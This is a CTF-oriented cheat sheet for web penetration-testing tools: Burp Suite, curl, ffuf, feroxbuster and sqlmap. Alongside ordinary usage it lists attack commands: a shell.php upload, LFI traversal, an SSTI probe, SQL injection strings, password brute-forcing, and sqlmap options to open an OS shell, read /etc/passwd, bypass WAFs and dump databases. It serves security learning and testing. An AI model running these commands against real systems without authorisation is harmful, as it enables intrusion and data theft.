webtools

tool burp · ffuf sqlmap · ferox
Burp Suitecurl ffufferoxbustersqlmap
01Burp Suite
Setup & proxy
# Burp proxy: 127.0.0.1:8080 (default)
# Browser: set HTTP proxy to 127.0.0.1:8080
# Install CA cert: http://burpsuite  (in browser via Burp)

# curl through Burp proxy
curl -x http://127.0.0.1:8080 -k https://target/
curl --proxy http://127.0.0.1:8080 --insecure https://target/

# Intercept toggle: Proxy → Intercept → On/Off
# Forward: forward button or Ctrl+F
# Drop request: drop button

# Scope: add target to scope
# Target → Scope → Add → paste URL
# Then: Proxy → Options → "intercept only in-scope"
Repeater & Intruder
# Repeater: replay/modify requests manually
# Right-click request → Send to Repeater (Ctrl+R)
# Modify → Send → see response

# Intruder: fuzzing/brute force
# Right-click → Send to Intruder (Ctrl+I)
# Positions tab: mark § payload positions §
# Attack types:
#   Sniper: one payload set, one position at a time
#   Battering Ram: same payload for all positions
#   Pitchfork: parallel payload sets per position
#   Cluster Bomb: all combinations (password spray)
# Payloads tab: add wordlist or simple list
# Options tab: set threads, timeout

# Sort results by status code or response length
# Different length = interesting response
Decoder & useful tabs
# Decoder: Burp → Decoder tab
# Paste encoded data → decode as:
# URL, HTML, Base64, Hex, Binary, Gzip, etc.
# Chain decodings (decode base64 → URL decode)

# Logger (Pro) / HTTP History
# Proxy → HTTP History → see all requests
# Filter by host, status code, method

# Search all history
# Proxy → HTTP History → right-click → Search

# Scanner (Pro): active scan for vulns
# Right-click request → Scan

# Comparer: diff two requests/responses
# Right-click → Send to Comparer
# Useful: compare auth vs unauth response
02curl — Raw HTTP
Request types
# GET request
curl https://target/path
curl -s https://target/    # silent (no progress)
curl -v https://target/    # verbose (headers)
curl -k https://target/    # skip cert verify

# POST with data
curl -X POST https://target/login \
  -d "user=admin&pass=1234"

# POST JSON
curl -X POST https://target/api \
  -H "Content-Type: application/json" \
  -d '{"user":"admin","pass":"1234"}'

# Custom headers
curl -H "Authorization: Bearer TOKEN" \
  -H "X-Admin: true" https://target/

# Upload file
curl -F "file=@shell.php" https://target/upload
Cookies & auth
# Send cookie
curl -b "session=abc123" https://target/
curl --cookie "session=abc123; admin=true" https://target/

# Save + send cookies (session handling)
curl -c cookies.txt https://target/login \
  -d "user=admin&pass=1234"
curl -b cookies.txt https://target/admin

# Basic auth
curl -u admin:password https://target/
curl -H "Authorization: Basic $(echo -n 'admin:pass' | base64)" \
  https://target/

# Follow redirects
curl -L https://target/

# Only show response headers
curl -I https://target/
curl -D - https://target/ -o /dev/null  # headers + discard body
CTF one-liners
# Read flag from LFI
curl -s "https://target/?file=../../../flag"

# Test SSTI
curl -s "https://target/?name={{7*7}}"

# Send raw bytes in POST
curl -X POST https://target/ \
  --data-binary $'\x00\x01\x02\x03'

# URL-encoded payload
curl -G https://target/search \
  --data-urlencode "q=' OR 1=1--"

# Get response code only
curl -o /dev/null -s -w "%{http_code}\n" https://target/admin

# Websocket (websocat is better, but basic)
curl --include --no-buffer \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" https://target/ws
03ffuf — Fast Web Fuzzer
Directory & file discovery
# Install: go install github.com/ffuf/ffuf/v2@latest

# Basic directory fuzzing
ffuf -u https://target/FUZZ \
  -w /usr/share/wordlists/dirb/common.txt

# With file extensions
ffuf -u https://target/FUZZ \
  -w /usr/share/wordlists/dirb/common.txt \
  -e .php,.html,.txt,.bak,.zip

# Filter by status code (exclude 404)
ffuf -u https://target/FUZZ -w words.txt \
  -fc 404                  # filter code 404
ffuf -u https://target/FUZZ -w words.txt \
  -mc 200,301,302         # match only these codes

# Filter by response size
ffuf -u https://target/FUZZ -w words.txt \
  -fs 4242               # filter responses of size 4242
Parameter & POST fuzzing
# GET parameter fuzzing
ffuf -u "https://target/search?q=FUZZ" -w payloads.txt

# POST parameter fuzzing
ffuf -u https://target/login \
  -X POST \
  -d "user=admin&pass=FUZZ" \
  -w /usr/share/wordlists/rockyou.txt \
  -fc 401

# Virtual host fuzzing
ffuf -u https://target/ \
  -H "Host: FUZZ.target.com" \
  -w subdomains.txt -fs 1234

# Header fuzzing
ffuf -u https://target/ \
  -H "X-Forwarded-For: FUZZ" \
  -w ips.txt

# Multiple positions (CLUSTERBOMB)
ffuf -u https://target/FUZZ1/FUZZ2 \
  -w words1.txt:FUZZ1 -w words2.txt:FUZZ2 \
  -mode clusterbomb
04feroxbuster — Recursive Brute Force
Usage
# Install: cargo install feroxbuster

# Basic recursive scan
feroxbuster -u https://target

# Custom wordlist
feroxbuster -u https://target \
  -w /usr/share/wordlists/dirb/common.txt

# Add extensions
feroxbuster -u https://target \
  -x php,html,txt,bak,zip,tar

# Limit recursion depth
feroxbuster -u https://target -d 2

# Threads
feroxbuster -u https://target -t 50

# Filter by status
feroxbuster -u https://target \
  -C 404,403               # filter these codes

# Save output
feroxbuster -u https://target \
  -o results.txt
Wordlists
PathSizeUse
/usr/share/wordlists/dirb/common.txt~4kQuick recon
/usr/share/wordlists/dirb/big.txt~20kMedium scan
/usr/share/dirbuster/directory-list-2.3-medium.txt~220kDeep scan
SecLists/Discovery/Web-Content/raft-medium-words.txt~63kBalanced CTF
SecLists/Discovery/Web-Content/api/objects.txtsmallAPI endpoints
SecLists/Passwords/rockyou.txt14MPassword brute
# Get SecLists
git clone --depth 1 https://github.com/danielmiessler/SecLists
05sqlmap — SQL Injection
Basic usage
# Test URL parameter
sqlmap -u "http://target/page?id=1"

# Test + enumerate databases
sqlmap -u "http://target/?id=1" --dbs

# Enumerate tables in database
sqlmap -u "http://target/?id=1" -D mydb --tables

# Dump table
sqlmap -u "http://target/?id=1" \
  -D mydb -T users --dump

# Dump all databases
sqlmap -u "http://target/?id=1" --dump-all

# From Burp request file
sqlmap -r request.txt --dbs
# (Save raw request from Burp → Repeater → Save)
Advanced options
# Increase aggressiveness (find harder injections)
sqlmap -u "http://target/?id=1" \
  --level=5 --risk=3

# Test POST parameter
sqlmap -u https://target/login \
  --data "user=admin&pass=1234" \
  -p pass   # target 'pass' parameter

# With cookies (authenticated scan)
sqlmap -u https://target/profile \
  --cookie "session=abc123" --dbs

# Force DB type
sqlmap -u "..." --dbms=mysql    # mysql|postgresql|sqlite|mssql

# Get OS shell (if stacked queries allowed)
sqlmap -u "..." --os-shell

# Read file
sqlmap -u "..." --file-read /etc/passwd
sqlmap -u "..." --file-read /flag

# Bypass WAF with tamper scripts
sqlmap -u "..." --tamper space2comment
sqlmap -u "..." --tamper between,randomcase
WEB TOOLS QUICK GUIDE →  Burp: proxy → intercept → Repeater for manual, Intruder for brute  · curl: -s -v -k -L -b cookie -H header -d post -F file  · ffuf: -u URL/FUZZ -w wordlist -fc 404 -e .php,.txt  · ferox: recursive by default, add -x php,html -d 2 -C 403,404  · sqlmap: -u URL?param=1 --dbs then -D db -T table --dump